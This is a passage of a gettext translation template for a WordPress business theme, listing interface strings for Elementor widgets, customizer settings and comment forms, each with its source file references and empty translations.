#: inc/backend/elementor/widgets/client-logos.php:387
#: inc/backend/elementor/widgets/countdown.php:191
#: inc/backend/elementor/widgets/countdown.php:236
#: inc/backend/elementor/widgets/countdown.php:264
#: inc/backend/elementor/widgets/counter-icon.php:162
#: inc/backend/elementor/widgets/counter-icon.php:184
#: inc/backend/elementor/widgets/counter-icon.php:228
#: inc/backend/elementor/widgets/counter.php:161
#: inc/backend/elementor/widgets/counter.php:207
#: inc/backend/elementor/widgets/flip-box.php:179
#: inc/backend/elementor/widgets/flip-box.php:208
#: inc/backend/elementor/widgets/flip-box.php:270
#: inc/backend/elementor/widgets/flip-box.php:320
#: inc/backend/elementor/widgets/heading.php:179
#: inc/backend/elementor/widgets/heading.php:252
#: inc/backend/elementor/widgets/icon-box-1.php:450
#: inc/backend/elementor/widgets/icon-box-1.php:556
#: inc/backend/elementor/widgets/icon-box-1.php:601
#: inc/backend/elementor/widgets/icon-box-1.php:659
#: inc/backend/elementor/widgets/icon-box-grid.php:255
#: inc/backend/elementor/widgets/icon-box-grid.php:336
#: inc/backend/elementor/widgets/icon-box-grid.php:364
#: inc/backend/elementor/widgets/image-box-carousel.php:335
#: inc/backend/elementor/widgets/image-box-carousel.php:374
#: inc/backend/elementor/widgets/image-box-carousel.php:440
#: inc/backend/elementor/widgets/image-box-carousel.php:493
#: inc/backend/elementor/widgets/image-box-carousel.php:542
#: inc/backend/elementor/widgets/image-box-carousel.php:610
#: inc/backend/elementor/widgets/image-box.php:234
#: inc/backend/elementor/widgets/image-box.php:276
#: inc/backend/elementor/widgets/image-box.php:341
#: inc/backend/elementor/widgets/image-box.php:394
#: inc/backend/elementor/widgets/message-box.php:153
#: inc/backend/elementor/widgets/message-box.php:217
#: inc/backend/elementor/widgets/message-box.php:245
#: inc/backend/elementor/widgets/portfolio-carousel.php:277
#: inc/backend/elementor/widgets/portfolio-carousel.php:327
#: inc/backend/elementor/widgets/portfolio-carousel.php:383
#: inc/backend/elementor/widgets/portfolio-carousel.php:418
#: inc/backend/elementor/widgets/portfolio-filter.php:497
#: inc/backend/elementor/widgets/portfolio-filter.php:559
#: inc/backend/elementor/widgets/portfolio-filter.php:624
#: inc/backend/elementor/widgets/post-carousel.php:257
#: inc/backend/elementor/widgets/post-carousel.php:296
#: inc/backend/elementor/widgets/post-carousel.php:335
#: inc/backend/elementor/widgets/post-carousel.php:383
#: inc/backend/elementor/widgets/post-carousel.php:456
#: inc/backend/elementor/widgets/post-carousel.php:524
#: inc/backend/elementor/widgets/pricing-table.php:218
#: inc/backend/elementor/widgets/pricing-table.php:273
#: inc/backend/elementor/widgets/pricing-table.php:301
#: inc/backend/elementor/widgets/pricing-table.php:346
#: inc/backend/elementor/widgets/pricing-table.php:401
#: inc/backend/elementor/widgets/pricing-table.php:491
#: inc/backend/elementor/widgets/pricing-table.php:544
#: inc/backend/elementor/widgets/progress-bars.php:133
#: inc/backend/elementor/widgets/progress-bars.php:182
#: inc/backend/elementor/widgets/progress-bars.php:280
#: inc/backend/elementor/widgets/progress-bars.php:308
#: inc/backend/elementor/widgets/switcher.php:121
#: inc/backend/elementor/widgets/switcher.php:162
#: inc/backend/elementor/widgets/tab-titles.php:165
#: inc/backend/elementor/widgets/tab-titles.php:197
#: inc/backend/elementor/widgets/tabs.php:165
#: inc/backend/elementor/widgets/tabs.php:206
#: inc/backend/elementor/widgets/tabs.php:243
#: inc/backend/elementor/widgets/team-1.php:347
#: inc/backend/elementor/widgets/team-1.php:391
#: inc/backend/elementor/widgets/team-1.php:481
#: inc/backend/elementor/widgets/team-2.php:295
#: inc/backend/elementor/widgets/team-2.php:355
#: inc/backend/elementor/widgets/team-2.php:414
#: inc/backend/elementor/widgets/team-3.php:372
#: inc/backend/elementor/widgets/team-3.php:432
#: inc/backend/elementor/widgets/team-3.php:491
#: inc/backend/elementor/widgets/team-carousel.php:422
#: inc/backend/elementor/widgets/team-carousel.php:482
#: inc/backend/elementor/widgets/team-carousel.php:541
#: inc/backend/elementor/widgets/team-carousel.php:619
#: inc/backend/elementor/widgets/team-carousel.php:687
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:479
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:547
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:462
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:531
#: inc/backend/elementor/widgets/video-button.php:152
#: inc/backend/elementor/widgets/video-button.php:210
#: inc/backend/elementor/widgets/video-button.php:276
#: inc/backend/elementor/widgets/header/search.php:133
#: inc/backend/elementor/widgets/header/search.php:163
msgid "Color"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:142
#: inc/backend/elementor/widgets/client-logos.php:363
#: inc/backend/elementor/widgets/image-box-carousel.php:553
#: inc/backend/elementor/widgets/portfolio-carousel.php:394
#: inc/backend/elementor/widgets/post-carousel.php:467
#: inc/backend/elementor/widgets/team-carousel.php:630
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:490
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:473
msgid "Color Active"
msgstr ""

#: inc/backend/elementor/widgets/header/side-panel.php:119
msgid "Color Close Button"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:398
#: inc/backend/elementor/widgets/image-box-carousel.php:633
#: inc/backend/elementor/widgets/portfolio-carousel.php:429
#: inc/backend/elementor/widgets/post-carousel.php:547
#: inc/backend/elementor/widgets/team-1.php:358
#: inc/backend/elementor/widgets/team-1.php:503
#: inc/backend/elementor/widgets/team-2.php:306
#: inc/backend/elementor/widgets/team-2.php:437
#: inc/backend/elementor/widgets/team-3.php:383
#: inc/backend/elementor/widgets/team-3.php:514
#: inc/backend/elementor/widgets/team-carousel.php:433
#: inc/backend/elementor/widgets/team-carousel.php:564
#: inc/backend/elementor/widgets/team-carousel.php:710
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:570
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:553
msgid "Color Hover"
msgstr ""

#: inc/backend/elementor/widgets/team-3.php:296
msgid "Color Icon"
msgstr ""

#: inc/backend/customizer/customizer.php:274
msgid "Color Scheme"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:68
#: inc/backend/elementor/widgets/portfolio-filter.php:118
msgid "Columns"
msgstr ""

#: inc/backend/customizer/customizer.php:566
msgid "Comment"
msgstr ""

#: comments.php:29
msgid "Comment (1)"
msgstr ""

#: comments.php:54
msgid "Comment*"
msgstr ""

#: comments.php:29
msgid "Comments (%)"
msgstr ""

#: comments.php:29
msgid "Comments (0)"
msgstr ""

#: comments.php:41
msgid "Comments are closed."
msgstr ""

#: inc/backend/plugin-requires.php:29
#: inc/backend/elementor/widgets/contact-form7.php:44
msgid "Contact Form 7"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:52
msgid ""
"Contact form 7 - plugin must be installed and there must be some contact "
"forms made with the contact form 7"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:56
#: inc/backend/elementor/widgets/accordions.php:174
#: inc/backend/elementor/widgets/features-service.php:283
#: inc/backend/elementor/widgets/flip-box.php:115
#: inc/backend/elementor/widgets/heading.php:44
#: inc/backend/elementor/widgets/icon-box-1.php:524
#: inc/backend/elementor/widgets/icon-box-2.php:455
#: inc/backend/elementor/widgets/icon-box-grid.php:303
#: inc/backend/elementor/widgets/image-box-carousel.php:253
#: inc/backend/elementor/widgets/image-box.php:152
#: inc/backend/elementor/widgets/message-box.php:184
#: inc/backend/elementor/widgets/pricing-table.php:185
#: inc/backend/elementor/widgets/progress-bars.php:36
#: inc/backend/elementor/widgets/tabs.php:56
#: inc/backend/elementor/widgets/tabs.php:236
msgid "Content"
msgstr ""

#: inc/backend/elementor/column.php:75
msgid "Content Align"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:102
#: inc/backend/elementor/widgets/icon-box-grid.php:133
#: inc/backend/elementor/widgets/icon-box-grid.php:139
#: inc/backend/elementor/widgets/icon-box-grid.php:145
msgid "Content Marketing"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:70
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:94
msgid "Content:"
msgstr ""

#. %s: Name of current post. Only visible to screen readers
#: template-parts/content-single.php:127
#, php-format
msgid "Continue reading<span class=\"screen-reader-text\"> \"%s\"</span>"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:303
#: inc/backend/elementor/widgets/header/cart.php:82
msgid "Count Color"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:35
msgid "CountDown"
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:35
#: inc/backend/elementor/widgets/counter.php:35
msgid "Counter"
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:81
#: inc/backend/elementor/widgets/counter.php:96
msgid "Current Clients"
msgstr ""

#: inc/backend/elementor/widgets/button.php:45
msgid "Dark Color"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:224
msgid "Dark Style"
msgstr ""

#: inc/backend/customizer/customizer.php:564
msgid "Date"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:195
msgid "Date CSS"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:94
#: inc/backend/elementor/widgets/countdown.php:96
msgid "Day"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:135
#: inc/backend/elementor/widgets/countdown.php:137
msgid "Days"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:96
#: inc/backend/elementor/widgets/heading.php:32
#: inc/backend/elementor/widgets/image-box-carousel.php:158
#: inc/backend/elementor/widgets/portfolio-carousel.php:76
#: inc/backend/elementor/widgets/post-carousel.php:96
#: inc/backend/elementor/widgets/team-carousel.php:204
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:126
msgid "Default"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:84
#: inc/backend/elementor/widgets/features-service.php:214
#: inc/backend/elementor/widgets/features-service.php:255
#: inc/backend/elementor/widgets/features-service.php:342
#: inc/backend/elementor/widgets/flip-box.php:262
#: inc/backend/elementor/widgets/icon-box-1.php:590
#: inc/backend/elementor/widgets/icon-box-2.php:541
#: inc/backend/elementor/widgets/icon-box-grid.php:356
#: inc/backend/elementor/widgets/image-box-carousel.php:83
#: inc/backend/elementor/widgets/image-box-carousel.php:366
#: inc/backend/elementor/widgets/image-box.php:268
#: inc/backend/elementor/widgets/message-box.php:237
msgid "Description"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:296
#: inc/backend/elementor/widgets/icon-box-2.php:245
#: inc/backend/elementor/widgets/icon-box-2.php:328
msgid "Description Color"
msgstr ""

#: inc/frontend/widgets/author-widget.php:108
msgid "Description:"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:83
#: inc/backend/elementor/widgets/icon-box-2.php:90
msgid "Design & Planning"
msgstr ""

#: inc/backend/customizer/customizer.php:463
#: inc/backend/customizer/customizer.php:507
msgid "Desktop"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:366
msgid "Details"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:87
msgid ""
"Discover the emerging technologies most relevant to your strategy by working."
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:353
#: inc/backend/elementor/widgets/icon-box-1.php:507
msgid "Dot Color"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:161
#: inc/backend/elementor/widgets/client-logos.php:324
#: inc/backend/elementor/widgets/image-box-carousel.php:223
#: inc/backend/elementor/widgets/image-box-carousel.php:514
#: inc/backend/elementor/widgets/portfolio-carousel.php:152
#: inc/backend/elementor/widgets/portfolio-carousel.php:355
#: inc/backend/elementor/widgets/post-carousel.php:160
#: inc/backend/elementor/widgets/post-carousel.php:428
#: inc/backend/elementor/widgets/team-carousel.php:268
#: inc/backend/elementor/widgets/team-carousel.php:591
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:190
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:451
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:216
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:433
msgid "Dots"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-2.php:228
msgid "Dots Style"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:154
msgid "Dropdown Menus"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:161
msgid "Dropdown/ Select Box css"
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:106
#: inc/backend/elementor/widgets/counter.php:121
msgid "Duration"
msgstr ""

#: inc/backend/plugin-requires.php:24
msgid "Elementor Page Builder"
msgstr ""

#: comments.php:63
msgid "Email*"
msgstr ""

#: inc/backend/customizer/customizer.php:301
msgid "Enable when your header is transparent."
msgstr ""

#: inc/backend/elementor/widgets/heading.php:57
msgid "Enter your subtitle"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:71
msgid "Enter your title"
msgstr ""

#: inc/backend/customizer/customizer.php:615
msgid "Entry Footer"
msgstr ""

#: inc/backend/customizer/customizer.php:560
msgid "Entry Meta"
msgstr ""

#: inc/backend/elementor/widgets/post-carousel.php:288
msgid "Excerpt"
msgstr ""

#: inc/backend/elementor/widgets/image-box-carousel.php:144
#: inc/backend/elementor/widgets/image-box.php:137
msgid "Explore More"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:72
#: inc/backend/elementor/widgets/team-1.php:382
#: inc/backend/elementor/widgets/team-2.php:72
#: inc/backend/elementor/widgets/team-2.php:330
#: inc/backend/elementor/widgets/team-3.php:72
#: inc/backend/elementor/widgets/team-3.php:407
#: inc/backend/elementor/widgets/team-carousel.php:457
msgid "Extra/Job"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:297
msgid "Extra/Job Color"
msgstr ""

#: inc/backend/customizer/customizer.php:603
#: inc/backend/elementor/widgets/team-1.php:133
#: inc/backend/elementor/widgets/team-2.php:133
#: inc/backend/elementor/widgets/team-3.php:133
msgid "Facebook"
msgstr ""

#: inc/frontend/template-tags.php:326
msgid "Facebook URL"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:132
#: inc/backend/elementor/widgets/icon-box-grid.php:138
#: inc/backend/elementor/widgets/icon-box-grid.php:144
msgid "fas fa-star"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:101
msgid "Features Service List Items"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:184
msgid "File CSS"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:223
msgid "Filter"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:36
msgid "Flip Box"
msgstr ""

#: inc/backend/customizer/customizer.php:241
msgid "Footer"
msgstr ""

#: inc/backend/customizer/customizer.php:765
msgid "Footer Fixed On/Off?"
msgstr ""

#: inc/backend/elementor/elementor.php:166
msgid "For Header"
msgstr ""

#: inc/backend/elementor/widgets/header/search.php:73
msgid "Form"
msgstr ""

#: inc/backend/meta-boxes.php:18
msgid "Format Details"
msgstr ""

#: inc/backend/meta-boxes.php:34
msgid "Gallery"
msgstr ""

#: inc/backend/elementor/widgets/image-box-carousel.php:235
#: inc/backend/elementor/widgets/portfolio-carousel.php:164
#: inc/backend/elementor/widgets/portfolio-filter.php:133
#: inc/backend/elementor/widgets/post-carousel.php:172
#: inc/backend/elementor/widgets/team-carousel.php:280
msgid "Gap Width"
msgstr ""

#: inc/backend/customizer/customizer.php:195
#: inc/backend/elementor/widgets/button.php:122
#: inc/backend/elementor/widgets/features-service.php:159
#: inc/backend/elementor/widgets/icon-box-1.php:146
#: inc/backend/elementor/widgets/icon-box-2.php:141
#: inc/backend/elementor/widgets/portfolio-carousel.php:186
#: inc/backend/elementor/widgets/portfolio-filter.php:36
#: inc/backend/elementor/widgets/portfolio-filter.php:338
#: inc/backend/elementor/widgets/post-carousel.php:194
#: inc/backend/elementor/widgets/team-1.php:170
#: inc/backend/elementor/widgets/team-2.php:170
#: inc/backend/elementor/widgets/team-2.php:207
#: inc/backend/elementor/widgets/team-3.php:170
#: inc/backend/elementor/widgets/team-carousel.php:297
#: inc/backend/elementor/widgets/team-carousel.php:334
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:206
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:254
msgid "General"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:124
#: inc/backend/elementor/widgets/image-box-carousel.php:262
#: inc/backend/elementor/widgets/image-box.php:161
msgid "Gereral"
msgstr ""

#: inc/frontend/template-tags.php:334
msgid "Github Profile"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:93
msgid "Global CSS For all fields"
msgstr ""

#: inc/frontend/template-tags.php:331
msgid "Google +"
msgstr ""

#: inc/backend/customizer/customizer.php:280
msgid "Google Analytics(Script Code)"
msgstr ""

#: inc/backend/customizer/customizer.php:606
msgid "Google Plus"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:46
msgid "Grid"
msgstr ""

#: inc/backend/customizer/customizer.php:212
msgid "Header"
msgstr ""

#: inc/backend/meta-boxes.php:158 inc/backend/customizer/customizer.php:300
msgid "Header Transparent?"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:127
msgid "Heading"
msgstr ""

#: inc/backend/customizer/customizer.php:890
msgid "Heading 1"
msgstr ""

#: inc/backend/customizer/customizer.php:909
msgid "Heading 2"
msgstr ""

#: inc/backend/customizer/customizer.php:928
msgid "Heading 3"
msgstr ""

#: inc/backend/customizer/customizer.php:947
msgid "Heading 4"
msgstr ""

#: inc/backend/customizer/customizer.php:966
msgid "Heading 5"
msgstr ""

#: inc/backend/customizer/customizer.php:985
msgid "Heading 6"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:210
#: inc/backend/elementor/widgets/features-service.php:134
#: inc/backend/elementor/widgets/progress-bars.php:144
#: inc/backend/elementor/widgets/header/logo.php:94
msgid "Height"
msgstr ""

#: inc/backend/customizer/customizer.php:699
#: inc/backend/elementor/widgets/portfolio-filter.php:198
msgid "Hidden"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:319
#: inc/backend/elementor/widgets/portfolio-filter.php:70
#: inc/backend/elementor/widgets/portfolio-filter.php:93
#: inc/backend/elementor/widgets/portfolio-filter.php:107
#: inc/backend/elementor/widgets/portfolio-filter.php:486
#: inc/backend/elementor/widgets/portfolio-filter.php:613
#: inc/backend/elementor/widgets/post-carousel.php:327
msgid "Hide"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:33
msgid "Highlight"
msgstr ""

#: inc/frontend/page-header/breadcrumbs.php:14
#: inc/frontend/page-header/breadcrumbs.php:16
msgid "Home"
msgstr ""

#: inc/backend/elementor/column.php:83
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:236
msgid "Horizontal"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:102
#: inc/backend/elementor/widgets/countdown.php:104
msgid "Hour"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:143
#: inc/backend/elementor/widgets/countdown.php:145
msgid "Hours"
msgstr ""

#: inc/backend/elementor/widgets/button.php:203
#: inc/backend/elementor/widgets/client-logos.php:284
#: inc/backend/elementor/widgets/features-service.php:227
#: inc/backend/elementor/widgets/features-service.php:415
#: inc/backend/elementor/widgets/flip-box.php:230
#: inc/backend/elementor/widgets/icon-box-1.php:218
#: inc/backend/elementor/widgets/icon-box-2.php:287
#: inc/backend/elementor/widgets/image-box-carousel.php:470
#: inc/backend/elementor/widgets/image-box.php:371
#: inc/backend/elementor/widgets/portfolio-filter.php:640
#: inc/backend/elementor/widgets/portfolio-filter.php:756
#: inc/backend/elementor/widgets/pricing-table.php:521
#: inc/backend/elementor/widgets/team-1.php:253
#: inc/backend/elementor/widgets/team-3.php:274
#: inc/backend/elementor/widgets/video-button.php:203
msgid "Hover"
msgstr ""

#: inc/backend/elementor/widgets/button.php:242
#: inc/backend/elementor/widgets/icon-box-2.php:192
#: inc/backend/elementor/widgets/team-1.php:277
#: inc/backend/elementor/widgets/team-3.php:227
msgid "Hover Animation"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:229
msgid "Hover Box Shadow"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:334
#: inc/backend/elementor/widgets/icon-box-1.php:567
#: inc/backend/elementor/widgets/icon-box-1.php:674
#: inc/backend/elementor/widgets/icon-box-2.php:518
#: inc/backend/elementor/widgets/image-box-carousel.php:346
#: inc/backend/elementor/widgets/image-box.php:245
#: inc/backend/elementor/widgets/portfolio-carousel.php:288
#: inc/backend/elementor/widgets/portfolio-filter.php:573
#: inc/backend/elementor/widgets/post-carousel.php:268
#: inc/backend/elementor/widgets/post-carousel.php:394
msgid "Hover Color"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:176
msgid "Hover Line Color"
msgstr ""

#: inc/backend/customizer/customizer.php:691
msgid "Hover Style"
msgstr ""

#. Author URI of the theme
msgid "http://oceanthemes.net/"
msgstr ""

#. URI of the theme
msgid "http://wpdemo.archiwp.com/maxbizz"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:109
#: inc/backend/elementor/widgets/team-1.php:160
#: inc/backend/elementor/widgets/team-2.php:109
#: inc/backend/elementor/widgets/team-2.php:160
#: inc/backend/elementor/widgets/team-3.php:109
#: inc/backend/elementor/widgets/team-3.php:160
msgid "https://"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:134
#: inc/backend/elementor/widgets/team-2.php:134
#: inc/backend/elementor/widgets/team-3.php:134
msgid "https://www.facebook.com/"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:143
#: inc/backend/elementor/widgets/team-2.php:143
#: inc/backend/elementor/widgets/team-3.php:143
msgid "https://www.pinterest.com/"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:125
#: inc/backend/elementor/widgets/team-2.php:125
#: inc/backend/elementor/widgets/team-3.php:125
msgid "https://www.twitter.com/"
msgstr ""

#: inc/backend/elementor/widgets/button.php:109
#: inc/backend/elementor/widgets/features-service.php:94
#: inc/backend/elementor/widgets/flip-box.php:101
#: inc/backend/elementor/widgets/icon-box-1.php:120
#: inc/backend/elementor/widgets/icon-box-2.php:127
#: inc/backend/elementor/widgets/icon-box-grid.php:120
#: inc/backend/elementor/widgets/image-box-carousel.php:94
#: inc/backend/elementor/widgets/image-box.php:126
#: inc/backend/elementor/widgets/pricing-table.php:114
#: inc/backend/elementor/widgets/video-button.php:71
msgid "https://your-link.com"
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:66
#: inc/backend/elementor/widgets/counter-icon.php:138
#: inc/backend/elementor/widgets/features-service.php:422
#: inc/backend/elementor/widgets/icon-box-1.php:68
#: inc/backend/elementor/widgets/icon-box-1.php:372
#: inc/backend/elementor/widgets/icon-box-2.php:75
#: inc/backend/elementor/widgets/icon-box-2.php:371
#: inc/backend/elementor/widgets/icon-box-grid.php:86
#: inc/backend/elementor/widgets/icon-box-grid.php:247
#: inc/backend/elementor/widgets/message-box.php:42
#: inc/backend/elementor/widgets/message-box.php:134
#: inc/backend/elementor/widgets/team-1.php:91
#: inc/backend/elementor/widgets/team-2.php:91
#: inc/backend/elementor/widgets/team-3.php:91
#: inc/backend/elementor/widgets/header/cart.php:35
#: inc/backend/elementor/widgets/header/menu-mobile.php:72
#: inc/backend/elementor/widgets/header/search.php:36
#: inc/backend/elementor/widgets/header/side-panel.php:36
msgid "Icon"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:360
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:342
msgid "Icon Background"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:36
#: inc/backend/elementor/widgets/icon-box-2.php:36
msgid "Icon Box"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:36
msgid "Icon Boxes"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:472
msgid "Icon Button"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:378
#: inc/backend/elementor/widgets/icon-box-1.php:252
#: inc/backend/elementor/widgets/icon-box-2.php:209
#: inc/backend/elementor/widgets/icon-box-2.php:293
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:349
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:331
#: inc/backend/elementor/widgets/header/cart.php:58
#: inc/backend/elementor/widgets/header/menu-mobile.php:79
#: inc/backend/elementor/widgets/header/search.php:59
#: inc/backend/elementor/widgets/header/side-panel.php:43
msgid "Icon Color"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:430
msgid "Icon List"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:55
msgid "Icon Position"
msgstr ""

#: inc/backend/elementor/widgets/video-button.php:126
#: inc/backend/elementor/widgets/header/cart.php:42
#: inc/backend/elementor/widgets/header/menu-mobile.php:90
#: inc/backend/elementor/widgets/header/search.php:43
#: inc/backend/elementor/widgets/header/side-panel.php:54
msgid "Icon Size"
msgstr ""

#: inc/backend/meta-boxes.php:25
#: inc/backend/elementor/widgets/client-logos.php:51
#: inc/backend/elementor/widgets/features-service.php:57
#: inc/backend/elementor/widgets/image-box-carousel.php:67
#: inc/backend/elementor/widgets/header/logo.php:67
msgid "Image"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:42
#: inc/backend/elementor/widgets/image-box-carousel.php:36
#: inc/backend/elementor/widgets/image-box.php:36
#: inc/backend/elementor/widgets/image-box.php:66
msgid "Image Box"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:314
#: inc/backend/elementor/widgets/team-2.php:200
#: inc/backend/elementor/widgets/team-3.php:313
#: inc/backend/elementor/widgets/team-carousel.php:327
msgid "Info Box"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:192
msgid "Info Box Style"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:302
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:284
msgid "Information"
msgstr ""

#: inc/backend/elementor/widgets/message-box.php:57
msgid "Information Box"
msgstr ""

#: inc/backend/elementor/widgets/header/search.php:125
msgid "Input"
msgstr ""

#: inc/frontend/template-tags.php:333
msgid "Instagram"
msgstr ""

#: inc/backend/plugin-requires.php:67
msgid "Install Plugins"
msgstr ""

#: inc/backend/plugin-requires.php:66
msgid "Install Required Plugins"
msgstr ""

#: inc/backend/plugin-requires.php:68
#, php-format
msgid "Installing Plugin: %s"
msgstr ""

#: template-parts/content-none.php:43
msgid ""
"It seems we can&rsquo;t find what you&rsquo;re looking for. Perhaps "
"searching can help."
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:419
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:401
msgid "Job"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:62
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:86
msgid "Job:"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:58
msgid "Keyword Research"
msgstr ""

#: inc/backend/plugin-requires.php:19
msgid "Kirki"
msgstr ""

#: inc/backend/elementor/widgets/button.php:98
msgid "Label"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:125
#: inc/backend/elementor/widgets/icon-box-1.php:130
msgid "Label Button"
msgstr ""

#: inc/frontend/widgets/recent-posts.php:27
msgid "Latest News"
msgstr ""

#: inc/backend/customizer/customizer.php:573
msgid "Layout"
msgstr ""

#: comments.php:53
msgid "Leave a comment"
msgstr ""

#: inc/backend/elementor/widgets/button.php:67
#: inc/backend/elementor/widgets/countdown.php:46
#: inc/backend/elementor/widgets/counter-icon.php:45
#: inc/backend/elementor/widgets/counter.php:46
#: inc/backend/elementor/widgets/counter.php:70
#: inc/backend/elementor/widgets/heading.php:101
#: inc/backend/elementor/widgets/icon-box-1.php:47
#: inc/backend/elementor/widgets/icon-box-2.php:60
#: inc/backend/elementor/widgets/icon-box-grid.php:47
#: inc/backend/elementor/widgets/image-box-carousel.php:46
#: inc/backend/elementor/widgets/image-box.php:46
#: inc/backend/elementor/widgets/portfolio-carousel.php:198
#: inc/backend/elementor/widgets/portfolio-filter.php:237
#: inc/backend/elementor/widgets/portfolio-filter.php:350
#: inc/backend/elementor/widgets/portfolio-filter.php:684
#: inc/backend/elementor/widgets/progress-bars.php:87
#: inc/backend/elementor/widgets/switcher.php:45
#: inc/backend/elementor/widgets/tab-titles.php:75
#: inc/backend/elementor/widgets/team-1.php:181
#: inc/backend/elementor/widgets/team-2.php:219
#: inc/backend/elementor/widgets/team-3.php:325
#: inc/backend/elementor/widgets/team-carousel.php:346
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:45
#: inc/backend/elementor/widgets/video-button.php:47
#: inc/backend/elementor/widgets/header/logo.php:46
#: inc/backend/elementor/widgets/header/menu.php:59
msgid "Left"
msgstr ""

#: inc/backend/elementor/widgets/button.php:46
msgid "Light Color"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:34
msgid "Line"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:163
#: inc/backend/elementor/widgets/icon-box-2.php:161
#: inc/backend/elementor/widgets/pricing-table.php:390
#: inc/backend/elementor/widgets/progress-bars.php:196
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:247
msgid "Line Color"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:208
msgid "Line Height"
msgstr ""

#: inc/backend/meta-boxes.php:67 inc/backend/elementor/widgets/button.php:107
#: inc/backend/elementor/widgets/client-logos.php:61
#: inc/backend/elementor/widgets/features-service.php:92
#: inc/backend/elementor/widgets/flip-box.php:99
#: inc/backend/elementor/widgets/icon-box-1.php:118
#: inc/backend/elementor/widgets/icon-box-2.php:125
#: inc/backend/elementor/widgets/icon-box-grid.php:118
#: inc/backend/elementor/widgets/image-box-carousel.php:92
